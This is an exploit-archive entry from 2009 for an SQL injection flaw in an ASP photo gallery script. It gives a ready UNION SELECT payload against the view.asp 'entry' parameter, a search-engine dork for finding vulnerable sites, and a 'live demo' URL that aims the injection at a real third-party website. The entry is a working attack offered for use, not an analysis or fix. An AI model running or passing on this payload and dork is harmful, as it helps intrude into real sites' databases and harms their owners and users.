[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : A Better Member-Based ASP Photo Gallery (entry) SQL Injection Vuln
# Published : 2009-02-09
# Author : BackDoor
# Previous Title : BusinessSpace <= 1.2 (id) Remote SQL Injection Vulnerability
# Next Title : PHP Director <= 0.21 Remote Command Execution Exploit


Script:A Better Member-Based ASP Photo Gallery
Download:
http://www.ontarioabandonedplaces.com/ipguardian/ABetterMemberBasedASPPhotoGallery.zip
Demo:
www.ontarioabandonedplaces.com/ipguardian/gallery
Exploit:www.target.com/scriptpath/view.asp?entry=-1+union+select+0,title,2,creator,Longitude,5,pics+from+photos
Dork:intitle:"A Better ASP User Gallery"
Live Demo:
www.ontarioabandonedplaces.com/ipguardian/gallery/view.asp?entry=-1+union+select+0,title,2,creator,Longitude,5,pics+from+photos
BackDoordan Sevgilerle Thanks All Cyber-Warrior User : )
BackDoor Cyber-Warrior.Org - Ak?±nc?±lar - Lojistik

# www.Syue.com [2009-02-09]